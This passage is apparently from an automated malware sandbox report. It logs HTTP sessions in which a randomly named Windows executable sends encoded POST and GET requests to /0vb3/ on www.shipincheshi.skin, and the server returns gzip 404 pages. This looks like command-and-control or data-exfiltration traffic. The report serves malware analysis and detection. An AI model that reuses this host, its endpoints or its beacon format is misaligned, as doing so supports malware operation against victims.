                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 38 57 62 67 52 6a 6b 79 52 68 66 4c 2f 30 4b 6b 39 2f 47 48 48 41 55 49 55 6c 70 55 41 70 58 4e 45 48 79 6c 39 78 64 31 47 53 64 2f 48 7a 69 39 67 30 56 67 61 59 30 34 7a 44 6f 42 51 45 62 6a 37 77 35 32 73 6f 50 52 72 72 42 54 31 69 4d 54 66 47 4b 4b 56 6b 37 2b 79 63 68 36 76 48 39 6f 2b 74 59 6e 64 5a 32 62 76 4a 77 37 41 2b 6e 65 79 69 6e 34 54 71 7a 6d 54 73 51 45 4c 45 45 34 55 4a 58 52 59 30 6c 33 73 37 76 43 75 4b 61 50 7a 6e 48 32 36 59 51 69 31 53 34 53 66 46 56 6f 76 34 57 47 2b 7a 2f 50 69 4a 4c 48 61 51 68 4a 63 67 75 2f 69 6e 36 62 68 50 4f 73 6e 44 41 38 65 6f 65 57 4a 38 45 3d
                                                  Data Ascii: prutfR_P=8WbgRjkyRhfL/0Kk9/GHHAUIUlpUApXNEHyl9xd1GSd/Hzi9g0VgaY04zDoBQEbj7w52soPRrrBT1iMTfGKKVk7+ych6vH9o+tYndZ2bvJw7A+neyin4TqzmTsQELEE4UJXRY0l3s7vCuKaPznH26YQi1S4SfFVov4WG+z/PiJLHaQhJcgu/in6bhPOsnDA8eoeWJ8E=
                                                  Sep 16, 2024 09:40:48.170674086 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:52:08 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 4837
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 1b 45 92 ff f9 f8 2b fa 4c 40 32 48 1a 49 56 64 d9 96 cd 2a b2 fc 85 d8 96 91 e4 84 1c c9 e9 b5 66 5a d2 e0 d1 f4 30 d3 b2 ad 84 bc 07 77 bb c0 de 25 04 16 8e 4d ee e0 b8 c0 7b 84 07 b7 c9 de ee 1e b0 40 b8 7f 26 72 9c 9f ee 5f b8 ea d1 b7 d1 4c 4b 16 0a c8 bb 37 7e b6 35 3d d5 d5 9f aa ae aa ae 6a cd 4c f2 6f 97 b3 e9 c2 85 ed 0c aa b2 9a b6 f4 44 b2 f3 8f 60 65 e9 09 04 47 b2 46 18 46 72 15 9b 16 61 8b 53 3b 85 95 60 62 aa 7d 89 a9 4c 23 4b 0f ff f8 dd c3 ef 3e 6e de 78 f7 e1 fb 1f 3f 7a ff d6 d1 bd 7b 49 a9 75 c5 c1 40 c7 35 b2 38 65 d2 12 65 d6 14 92 a9 ce 88 0e ec 74 aa ea 0a 39 08 e8 b4 4c 35 8d ee 4f 21 a9 dd cb 62 8d 0e 07 7e 48 cf a0 33 d8 22 e8 19 a9 db 54 a2 4a 03 5d e9 9e f2 43 a6 1a 35 e7 d1 93 33 33 33 0b 7d 17 ca 30 e0 3c 8a c4 8d 03 74 8e 98 0a d6 71 00 4d ad 11 6d 8f 30 55 c6 68 8b d4 c9 54 00 55 3b 0d 01 94 32 55 ac 05 90 6f 53 95 4d 6a d1 32 43 17 f0 1a 51 7d 01 64 61 dd 0a 5a c4 54 cb fd 43 d4 b0 59 51 f5 79 14 ee 6f 36 b0 a2 a8 7a 05 da [TRUNCATED]
                                                  Data Ascii: \wE+L@2HIVd*fZ0w%M{@&r_LK7~5=jLoD`eGFFraS;`b}L#K>nx?z{Iu@58eet9L5O!b~H3"TJ]C5333}0<tqMm0UhTU;2UoSMj2CQ}daZTCYQyo6zQ4?=O!vs-2Ga>Q+UtUSuD&22\=\W~XecDxD,QS!fj$P{qCU["JK}u32rJPs4.h<R@DB<8Y31t{E6<bI3+'\r1 r"Kq*wSCz_6-C@G@I~jwEBdvf<D%m7-p^uqM(MuplAPK5Gh"&53jlX&oixwm9a#[C{IAF9T#+d{@G(p&:'t~Ki5Rf!4@)EtVw{ozSk*.EaPCVDdxpm,!^r >hnn8@[2zvzY8)xP#.,^=zDccXa0JU=Qy50w#[]tgb*FX7h*sWKg.XV^m48Fad;gFA''t"0
                                                  Sep 16, 2024 09:40:48.170694113 CEST224INData Raw: 13 16 cb c7 f5 79 81 dc f6 aa 76 fc 72 d2 37 c4 5f 88 36 06 46 83 c8 80 22 43 c4 c1 63 fb 5d ad 02 93 fe 80 2d 64 a4 a8 7b f3 20 21 0b ca 55 55 53 84 6e d4 5a b4 47 5b 59 db b4 43 16 57 c7 42 d8 97 ce 9c c3 50 41 42 aa 6a 89 73 9a e0 1e 36 5b b9
                                                  Data Ascii: yvr7_6F"Cc]-d{ !UUSnZG[YCWBPABjs6[[px=V|Y= .~}% ?_p{O$cEP*{o*0nAh(UlqWn:qS2!V`1p7BV@Xm|0
                                                  Sep 16, 2024 09:40:48.170706987 CEST1236INData Raw: 0d c2 d4 fc 08 28 60 d5 a6 d8 f1 db 4e 15 4d 3c f5 a3 4c 6b bf aa 32 12 b4 cb a2 79 88 c8 dc 39 7e 04 9c 11 d3 2c 67 f4 48 53 a3 61 87 1a 6f 31 24 77 2e 0d a9 85 3c 41 ac af c8 19 50 4c da 5d 07 ef 9f 38 e1 e5 b7 53 5b 88 68 a4 06 89 92 05 4a 65
                                                  Data Ascii: (`NM<Lk2y9~,gHSao1$w.<APL]8S[hJeUJ`Za`XRa:9Ty]=$chwNwh;CY+}m7eZsNtch>8znoB59{8Vu[eVA-QzP|n
                                                  Sep 16, 2024 09:40:48.170763016 CEST224INData Raw: a4 24 eb 55 7a c3 8e 24 33 07 40 64 ca 92 61 d6 59 39 57 dc 06 b8 ca 60 aa 81 63 24 ce 97 2a b9 97 77 1b b9 6a 79 43 0a 9f dd 9d 93 56 d7 d6 52 3b eb 3b 9a b1 93 32 5e dc ca ac 35 b4 b9 03 25 b2 9a 57 a4 b5 cb ea 5c 25 7c ae 82 2f 84 63 97 97 e9
                                                  Data Ascii: $Uz$3@daY9W`c$*wjyCVR;;2^5%W\%|/c2gOG-33Y(={nw5j|om"vAW.Z{~6)[CcW.L&amKZ4~5+^*,mo:xTZr*A(9|"(\hN
                                                  Sep 16, 2024 09:40:48.170933008 CEST1236INData Raw: 79 7c b3 58 51 b9 5d 9f 84 41 a6 29 dd 55 4f 68 ec 3c b1 2c 5e d9 9f cc d8 26 e4 4e 52 ae 55 1e fd ec 2e b9 93 cf e4 c6 74 47 08 f3 c2 3e 63 5a f2 b1 50 d7 b2 9b 99 31 a1 4a 55 5a 23 d2 a4 01 e7 d3 b9 f5 ed 42 71 2b 35 3e ee de 62 38 49 e0 b9 cc
                                                  Data Ascii: y|XQ]A)UOh<,^&NRU.tG>cZP1JUZ#Bq+5>b8I;|[82& .Qf]|O5sXsB6Z-EBB_M2S[Ln%9,2B5A-d\aL3HlFqVFq
                                                  Sep 16, 2024 09:40:48.170943022 CEST224INData Raw: 57 bb dd 42 56 bd 64 31 d3 1f 0e a0 c8 b4 60 7c 7e c8 fc c5 69 be 27 7d f3 83 d3 da 1e ca 97 6c 98 15 c2 32 ad b6 33 8d 75 c5 33 1a 0c 75 49 bc b7 c6 0f fb e1 5d f1 e5 16 94 d0 10 28 4e fd f6 50 58 67 1a 69 6e eb 5b b8 e6 9e d0 21 b2 b8 44 71 32
                                                  Data Ascii: WBVd1`|~i'}l23u3uI](NPXgin[!Dq24X1``9-EOC-t(\HUQWlP?3 z `SNZ::w/7K~1dH%s`}EkEx8 H@
                                                  Sep 16, 2024 09:40:48.171073914 CEST686INData Raw: 7b c6 27 e0 c6 61 0f 9d 01 ae 01 2f ef 32 35 fd 5c 09 2a f4 0d 2f c0 bf a4 cd 29 a4 11 bd c2 aa d0 f0 ec b3 22 bd f1 03 7c ab ad 90 10 23 16 f3 f3 7e 2f a9 97 42 72 d7 b5 06 f5 6c e3 b5 01 86 8c ba 55 ed f4 9d 16 92 7b cd f6 aa 57 7e 8f c5 88 39
                                                  Data Ascii: {'a/25\*/)"|#~/BrlU{W~98zz)eLu78|.EHBj2V ",l!56|n]1\MJJ;-|hMYmY nwSQ%PQl4MM$


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  30192.168.2.549742154.23.176.197802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:49.773149014 CEST817OUTPOST /0vb3/ HTTP/1.1
                                                  Host: www.shipincheshi.skin
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.shipincheshi.skin
                                                  Referer: http://www.shipincheshi.skin/0vb3/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 38 57 62 67 52 6a 6b 79 52 68 66 4c 74 48 53 6b 2f 59 71 48 4f 41 55 4a 61 46 70 55 57 5a 58 4a 45 48 4f 6c 39 77 70 6c 47 42 70 2f 4a 7a 53 39 68 31 56 67 64 59 30 34 72 54 6f 45 4e 55 62 73 37 77 30 56 73 6f 7a 52 72 71 68 54 31 67 55 54 66 56 69 4a 55 30 37 34 36 38 68 34 68 6e 39 6f 2b 74 59 6e 64 5a 69 68 76 4a 49 37 41 4e 2f 65 7a 44 6e 2f 53 71 7a 6c 57 63 51 45 42 6b 45 6b 55 4a 58 2f 59 77 73 61 73 35 6e 43 75 49 79 50 69 56 76 78 77 59 51 6b 6f 43 34 43 51 51 67 55 70 59 6e 4d 39 54 75 6c 2f 2f 50 66 62 6d 4d 6a 47 43 6d 58 78 48 57 6a 78 63 47 62 32 7a 68 56 45 4c 4f 6d 58 72 53 35 4d 51 37 66 39 65 51 6f 72 4b 39 59 48 75 53 6e 48 30 2f 68
                                                  Data Ascii: prutfR_P=8WbgRjkyRhfLtHSk/YqHOAUJaFpUWZXJEHOl9wplGBp/JzS9h1VgdY04rToENUbs7w0VsozRrqhT1gUTfViJU07468h4hn9o+tYndZihvJI7AN/ezDn/SqzlWcQEBkEkUJX/Ywsas5nCuIyPiVvxwYQkoC4CQQgUpYnM9Tul//PfbmMjGCmXxHWjxcGb2zhVELOmXrS5MQ7f9eQorK9YHuSnH0/h
                                                  Sep 16, 2024 09:40:50.724030972 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:52:11 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 4860
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 46 72 ff b9 fe 2b b6 8c 13 52 09 09 90 d4 37 4a a2 94 d2 14 25 d1 91 44 99 a4 6c eb 62 97 0f 04 96 24 22 10 0b 03 4b 51 b2 e3 f7 92 f6 2e c9 b5 76 9c 5c d2 9c dd 26 cd 39 79 2f c9 4b 7a f6 f5 ae 4d 72 49 9c fe 33 a6 2c ff d4 7f a1 b3 e0 37 10 58 52 34 9d 50 77 85 9e 24 62 31 3b fb 99 d9 99 d9 99 25 80 f8 df 2e 67 92 f9 9d ad 14 aa d0 aa b6 74 2a de fe 87 25 65 e9 14 82 23 5e c5 54 42 72 45 32 2d 4c 17 7d db f9 95 50 cc d7 ba 44 55 aa e1 a5 47 7f fa fe d1 f7 1f 37 6e bd fb e8 fd 8f 1f bf 7f e7 e8 fe fd b8 d8 bc e2 60 a0 4b 55 bc e8 33 49 91 50 cb 87 64 a2 53 ac 03 3b 9d a8 ba 82 f7 83 3a 29 11 4d 23 75 1f 12 5b bd 2c 7a d0 e6 c0 0e f1 79 74 46 b2 30 7a 5e ec 34 15 89 72 80 ae 75 4e d9 21 13 8d 98 f3 e8 99 c9 c9 c9 85 9e 0b 25 18 70 1e 45 66 8c 7d 74 1e 9b 8a a4 4b 41 e4 5b c3 da 1e a6 aa 2c a1 4d 5c c3 be 20 aa b4 1b 82 28 61 aa 92 16 44 fe 0d 55 36 89 45 4a 14 ed 48 6b 58 f5 07 91 25 e9 56 c8 c2 a6 5a ea 1d a2 2a 99 65 55 9f 47 e1 de 66 43 52 14 55 2f 43 [TRUNCATED]
                                                  Data Ascii: \wFr+R7J%Dlb$"KQ.v\&9y/KzMrI3,7XR4Pw$b1;%.gt*%e#^TBrE2-L}PDUG7n`KU3IPdS;:)M#u[,zytF0z^4ruN!%pEf}tKA[,M\ (aDU6EJHkX%VZ*eUGfCRU/C;axKqeanL^(s2\c\Puu2Mh,&Mtl#Tk"g0\&7^k-M%K}5b3zROC)Qh ]vy0c3ggr=j]mx4MQw&rTB+Ui~N4iI5JZHljHiKZVoJZyYv0D,tj7m@F@S3UlQ-C1[>v[3elz8;xM*,M'*pgH'n~k|- aH%&?%4*kxc]]Dq)H098M2{;:Q.My7]3gZhK!Uo8?<jxSv,#v24Rm)jDuM8677Vv+:w`%kZ%6;>Bxfd8(,7p67!&=a`II"O
                                                  Sep 16, 2024 09:40:50.724059105 CEST224INData Raw: 3d d4 84 c5 f2 69 7d 9e 23 b7 bd aa 1d bf 9c f4 0c f1 17 a2 8d be d1 20 d2 a7 c8 e0 71 f0 d8 7e 47 ab c0 a4 37 60 73 19 29 ea de 3c 48 48 43 72 45 d5 14 ae 1b 35 17 ed e1 56 d6 16 ed 80 c5 d5 b1 10 f6 a4 33 e7 25 a8 20 21 55 b5 f8 39 4d 68 4f 32
                                                  Data Ascii: =i}# q~G7`s)<HHCrE5V3% !U9MhO2[ppd=V|I.CP;_p{W$KvTh-T`P"*i.p]^5VjMYKffKiCVIKaomhm3H@`
                                                  Sep 16, 2024 09:40:50.724909067 CEST1236INData Raw: 9e 6d 1b 84 a9 79 02 28 60 d5 26 df f1 5b 4e 15 8d 3d fb 44 a6 55 af a8 14 87 ec b2 68 1e 22 32 73 8e 27 80 33 64 9a e5 8c 1e 49 62 1c d8 a1 c6 5b 0c c9 ed 4b 03 6a 21 4f 10 eb 29 72 fa 14 93 76 d7 fe fb 27 4e 78 b9 ad c4 26 c2 1a ae 42 a2 64 81
                                                  Data Ascii: my(`&[N=DUh"2s'3dIb[Kj!O)rv'Nx&BdRiq!!E0,VPTu*8vqU^30nv{Av@uABB2:z:%hV>8zg:NT>W5'iL5]5;21
                                                  Sep 16, 2024 09:40:50.724920034 CEST224INData Raw: b9 d6 e8 fc 91 e2 b4 5b e9 0d 3a e2 d4 ec 03 91 2a 4b 86 59 a3 a5 6c 61 0b e0 2a fd a9 fa 8e 11 bb 50 2c 67 5f d9 3d c8 56 4a eb 74 2d b7 2b ee 5c 59 cb 24 b6 cf 4a 2b c6 f6 85 5f 5c 3c 9b 5a cb 68 73 75 43 5b 3d 63 88 67 af e6 e6 2a 91 f3 65 65
                                                  Data Ascii: [:*KYla*P,g_=VJt-+\Y$J+_\<ZhsuC[=cg*ee'<eIjsh-r5k^#|zv;<;5LU9BM&6E|uYsWjs3%Yz>RwTok(nWVk^WL87[
                                                  Sep 16, 2024 09:40:50.724931955 CEST1236INData Raw: 88 f9 d2 dc ce 5a 2d a7 af 85 c5 0a 57 19 5c 35 41 6b 1f 15 3b 28 fa 4f d6 d3 9b ca 8a ca 6c fd 24 8c 34 49 c8 ae 7a 42 63 e7 b0 65 b1 6a ff 64 c6 36 21 9f 12 b3 cd 92 e9 67 77 d3 ed 5c 2a 3b a2 8b 42 e8 e7 f6 19 d1 92 8f 85 ba 96 d9 48 8d 08 55
                                                  Data Ascii: Z-W\5Ak;(Ol$4IzBcejd6!gw\*;BHU*88gSS|a;8F gw|6:"jkpeGDn/Da|l&IfGo!2V|Bb+\M{6_j4'z#O2'g&
                                                  Sep 16, 2024 09:40:50.724958897 CEST933INData Raw: 50 ec e8 3c 42 d9 e4 eb e9 d2 01 3b d1 3b 4c e7 f1 04 37 43 ab ae 52 b9 d2 e9 26 58 b5 a2 45 cd 40 38 88 22 13 9c f1 d9 21 b3 97 a9 f9 9f f1 cf f7 4f 6b bb 28 5f b6 61 96 31 4d 35 db ce 1c a4 15 cf 68 30 d4 65 fe de 1a 3b ec 07 7a f9 97 9b 50 84
                                                  Data Ascii: P<B;;L7CR&XE@8"!Ok(_a1M5h0e;zPP$oJU%O>ixP3dB<[5^ ^4g&5SZ+NIrB/D)XLR\GY\N_tsh8'"CvT#


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  31192.168.2.549743154.23.176.197802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:52.314702988 CEST1834OUTPOST /0vb3/ HTTP/1.1
                                                  Host: www.shipincheshi.skin
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.shipincheshi.skin
                                                  Referer: http://www.shipincheshi.skin/0vb3/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 38 57 62 67 52 6a 6b 79 52 68 66 4c 74 48 53 6b 2f 59 71 48 4f 41 55 4a 61 46 70 55 57 5a 58 4a 45 48 4f 6c 39 77 70 6c 47 42 78 2f 4a 41 61 39 67 57 4e 67 63 59 30 34 6a 7a 6f 46 4e 55 62 78 37 77 39 63 73 6f 2f 76 72 76 6c 54 36 6c 41 54 4c 77 57 4a 42 6b 37 34 6c 73 68 37 76 48 39 35 2b 75 67 6a 64 5a 79 68 76 4a 49 37 41 4d 50 65 31 53 6e 2f 66 4b 7a 6d 54 73 52 4c 4c 45 45 59 55 4e 7a 4a 59 77 68 6e 76 4b 66 43 75 6f 43 50 78 41 7a 78 79 34 51 6d 70 43 35 64 51 51 6b 78 70 62 53 31 39 53 72 4b 2f 34 37 66 62 44 35 56 61 79 32 75 6b 58 4f 52 69 66 50 33 70 6b 70 35 4e 72 57 73 49 34 2b 71 42 6b 33 33 74 59 73 63 76 35 38 6f 59 49 47 55 42 53 54 74 55 32 55 62 73 6b 50 69 66 6f 69 58 78 2b 30 62 4c 47 66 4c 68 79 4f 67 32 58 50 65 48 77 30 74 52 63 39 59 2b 6e 64 52 44 53 31 74 6c 6d 2b 4b 43 48 76 4a 7a 39 6c 69 4a 70 30 6a 52 6f 76 79 67 49 36 74 30 50 52 6a 47 35 30 6b 33 38 45 6a 79 47 43 56 6e 51 4b 73 59 34 35 76 6c 67 35 33 32 4b 38 4a 77 32 34 7a 69 6c 64 5a 66 [TRUNCATED]
                                                  Data Ascii: prutfR_P=8WbgRjkyRhfLtHSk/YqHOAUJaFpUWZXJEHOl9wplGBx/JAa9gWNgcY04jzoFNUbx7w9cso/vrvlT6lATLwWJBk74lsh7vH95+ugjdZyhvJI7AMPe1Sn/fKzmTsRLLEEYUNzJYwhnvKfCuoCPxAzxy4QmpC5dQQkxpbS19SrK/47fbD5Vay2ukXORifP3pkp5NrWsI4+qBk33tYscv58oYIGUBSTtU2UbskPifoiXx+0bLGfLhyOg2XPeHw0tRc9Y+ndRDS1tlm+KCHvJz9liJp0jRovygI6t0PRjG50k38EjyGCVnQKsY45vlg532K8Jw24zildZfH7wZKvyEdENS0wvb1XE9VNXs0/CxAhaWzeN8B/scxIizB+jmHBUzpCDYprVPLvnm6oWLPmTa0CswvBgnZD7wt8rrIWpCexaZ0+rAEKcBFzzdoigYCWznL8y/gRO+se3MGLGHigm8O8sJnrqW5Jh5mXc78o79Dx3eLohAqD44fyR4NssVm9yVUxvzKpK1uu9WOa3W2emtqkKaQBFh5by6D/bg6uoTQgtKoGl1q4rqYtkZH9371tR8wkfurDmY3n/T1AA9c9iyMIDd7MAeL22hP0IcMedyHoodiwwSNRdsVc72QE7WxljmOcu0S6FsT+cWmudvFcr7SHihWWS6SKTsunyEyYbqsQzix+MYIqSGBsrUSoMIYyvhWbBiQ89LXeECOtv/oVoq6f2XHZOl1cHYkAVsoJ9q/V6MQn+T41Unl3n8sfJA+xH5dMOHjDUfK7zEYdHhU19YDjLxjm3FucPNASJ47mf2n1mLpILBhmsqpSoDHRHq17WeKpI8GUoQm1q+cjaTt0whJK8Pmh7sppeX0ppvFgsP3axMpIq95NCLG0dsxJOOJhb4WbT0yhCiiB0ZcRiiZM15rqcUk94b+iL3/OYIoFUMLELmicdTlY5f5rR4lds77YoNITxqPCy/SPY40SeJhlkczuvr9D1exikG4qGV9p5+Hd7rHf [TRUNCATED]
                                                  Sep 16, 2024 09:40:53.450965881 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:52:13 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 5757
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c 7b 77 e3 c6 75 ff bb fe 14 53 65 63 49 b6 48 80 6f 52 d2 2a a5 28 8a a4 c4 97 f8 10 45 d9 ae 0e 08 0c 09 88 20 06 02 06 7c c8 de 73 92 36 b1 9d d6 eb b5 93 d4 b1 db a4 8e 9d 73 62 9f a4 59 a7 49 1b 3b 76 d6 fd 32 4b ed ee 5f fd 0a 9d 01 1f 02 49 90 92 b9 36 95 14 3a 92 88 c1 9d 3b bf 7b e7 de 3b f7 0e 01 6c fe ed 4e 26 52 28 67 a3 40 c4 0d 79 eb 99 cd c1 3f c8 09 5b cf 00 72 6c 36 20 e6 00 2f 72 9a 0e f1 ed a5 62 61 d7 11 5c ea 5f c2 12 96 e1 d6 a3 3f 7c f1 e8 8b f7 bb f7 de 7e f4 93 f7 9f fc e4 bd c7 9f 7c b2 c9 f4 ae 58 18 28 5c 03 de 5e d2 50 05 61 7d 09 f0 48 c1 50 21 ec 14 24 29 02 6c af 29 a8 8a 64 19 b5 96 00 d3 ef a5 e3 ce 80 03 3d 98 e7 c0 36 a7 43 f0 1c 33 6c aa 20 a1 03 5e 1e 9e d2 83 47 32 d2 d6 c1 b7 3c 1e cf c6 c8 85 2a 19 70 1d b8 fc 6a 1b 1c 42 4d e0 14 6e 0d 2c c5 a1 dc 84 58 e2 39 90 86 06 5c 5a 03 e2 a0 61 0d 84 35 89 93 d7 c0 72 4a e2 35 a4 a3 2a 06 65 2e 0e a5 e5 35 a0 73 8a ee d0 a1 26 55 47 87 68 70 5a 4d 52 d6 01 3b da ac 72 82 20 29 35 d2 [TRUNCATED]
                                                  Data Ascii: \{wuSecIHoR*(E |s6sbYI;v2K_I6:;{;lN&R(g@y?[rl6 /rba\_?|~|X(\^Pa}HP!$)l)d=6C3l ^G2<*pjBMn,X9\Za5rJ5*e.5s&UGhpZMR;r )5,3$^eqT.uZ/T>v,)!zSu<1w|TW4jbM5a#Y ym YT1NGLea;#"t=@AO`O6l1lKN164D:| _+ /"%X~{FOU7VI@ZT=\NocT'bI5N8uV$wA)%8T9) RP14jkAu)[5G<TMd\>5Z:;P6`|KPv&QKM_;!*NwFNio1*<<)qkc&NP9l"'K5b"<<Gvl73z&iEP*x]fO @])uapS|%#zIWeS_p2!6u#SCgb)B: (%g.j\Kht=L6>531Yik
                                                  Sep 16, 2024 09:40:53.450989962 CEST224INData Raw: 4f ea d7 12 e9 ec d4 83 35 b2 58 3e ad cf db c8 6d ae 6a 57 2f 27 23 43 fc 85 68 63 6a 34 70 4d 29 32 ec 38 4c d8 fe 50 ab 84 c9 68 c0 b6 65 24 48 cd 75 22 21 76 f0 a2 24 0b b6 6e d4 5b b4 af b7 b2 f6 69 67 2c ae 96 85 70 24 9d 39 e4 48 05 49 52
                                                  Data Ascii: O5X>mjW/'#Chcj4pM)28LPhe$Hu"!v$n[ig,p$9HIRU>q49^#Wd^8;Ax*H?GKoXfRsfM_'SyK.zL/N3=u^a@bakV0Y H2"
                                                  Sep 16, 2024 09:40:53.450994968 CEST1236INData Raw: cc 80 44 3a 1b 0b 34 8d 8f cc b3 69 83 64 6a be 02 14 62 d5 9a bd e3 f7 9d ca 1d fc f6 57 32 ad 96 28 61 e8 30 cb a2 75 12 91 a9 73 7c 05 38 d7 4c b3 ac d1 23 82 d4 8e 19 6a 26 8b 21 7e 70 69 46 2d 34 11 c4 46 8a 9c 29 c5 a4 d9 75 fa fe 89 15 5e
                                                  Data Ascii: D:4idjbW2(a0us|8L#j&!~piF-4F)u^>N(ItT,,W"8W$!PUUCkz9$q5I1:?nF,8Pj3{aH[q{+;_?B^MN6FxP3
                                                  Sep 16, 2024 09:40:53.450999022 CEST224INData Raw: a6 b9 fd b8 05 1b 2a ee 90 82 cb 3c 21 01 b2 4f 65 5f c9 30 53 06 b9 f6 e0 d9 4c be 3f ba fd 48 9b f8 b2 d2 9b 75 6c 62 6d 0a 44 2c 6c a9 9a 81 ab b9 93 2c 81 2b 4c a7 9a 3a 46 b0 54 a9 e5 4e eb 9d 9c 58 4d e2 78 be ce 94 cf e2 99 70 71 8f db 55
                                                  Data Ascii: *<!Oe_0SL?HulbmD,l,+L:FTNXMxpqUh<#Zn3{a.T+k|tB~9\HJ{W@3v*w^"Ne+0FA%h>+D_(mACz[]xQ&'U
                                                  Sep 16, 2024 09:40:53.451006889 CEST1236INData Raw: d2 5a 49 4f 78 c1 d9 76 dd e3 c1 65 9d 6f fa 82 a8 9c 88 15 b7 f3 05 5c 74 17 2b 7a 3d 2b 55 91 74 d4 06 6c 25 19 ab 26 c5 4e a6 e6 3e ca c2 78 8b c5 39 3e 54 06 8a 90 db c9 bb b0 dc 00 fb 91 78 73 ef 3c 24 4b 7b 2a 7b 9a 43 cd 4e 2d e1 c7 6c 36
                                                  Data Ascii: ZIOxveo\t+z=+Utl%&N>x9>Txs<$K{*{CN-l6wuO0zE}5sI@xtm5+h0}L9Lo'mpoNYR2(plDo5kN(YZ9R:WSe=X2j`&)Y'
                                                  Sep 16, 2024 09:40:53.451009989 CEST224INData Raw: 43 73 3f 79 9a 7f 39 09 b2 37 01 f8 29 54 ed f2 79 9d 44 d1 ae 00 51 78 28 70 13 e0 9f 62 11 24 0e e0 d4 45 49 95 a8 f9 93 0f 4e bd 2e 29 37 21 43 3e b3 5b 28 85 73 f3 ca 11 56 39 22 c0 8d 00 4f c4 d2 e1 42 71 6e e4 cf ca 78 83 13 04 0d ea 3a fd
                                                  Data Ascii: Cs?y97)TyDQx(pb$EIN.)7!C>[(sV9"OBqnx:/Ho~e?CYa*3c=m@r$IOgJO?\ O5FF<'3zER-;BOFI8F9eLsI9dJRR+$6k|1$pB6$Y
                                                  Sep 16, 2024 09:40:53.451047897 CEST1236INData Raw: 60 92 b9 23 b7 3b b2 4a 7c 94 e4 9e 25 58 d9 97 30 e3 f3 04 9c 1e 3f 58 d9 8f 17 52 49 7a 1f 6e 1d 82 18 e4 eb 68 15 e4 b9 86 6e 28 b5 6d 0d b5 88 55 30 6e 52 87 46 44 8d ee 72 79 bc 74 b0 a0 37 e0 0c f8 09 a8 8a 24 13 47 e1 aa 9c 26 0d f8 2d 5c
                                                  Data Ascii: `#;J|%X0?XRIznhn(mU0nRFDryt7$G&-\$g:D\"6w1K&quIo[Kgxj "04*$F"{lPr{}E3L:y}xq#hh<I<T#kX9@E)
                                                  Sep 16, 2024 09:40:53.451119900 CEST370INData Raw: 7d 88 1e a5 a1 9d 7a dc c7 e9 c6 23 ee b8 ea 48 4e f5 e8 c1 fd ee 6b 9f d3 b7 30 7f f0 c6 64 a6 a3 69 27 e6 83 56 bd 59 36 9f f4 a4 51 8f 66 50 83 39 21 bf a3 03 0f 3a 5d c6 05 d2 dd a6 91 44 4b 70 f9 86 d7 f1 10 67 71 d6 95 65 86 e1 05 c5 59 41
                                                  Data Ascii: }z#HNk0di'VY6QfP9!:]DKpgqeYANaLFs3gCR_]W+l/^G?O?];?~/{$]}[o@2C7}n='=|p}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  32192.168.2.549744154.23.176.197802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:54.858746052 CEST529OUTGET /0vb3/?prutfR_P=xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.shipincheshi.skin
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
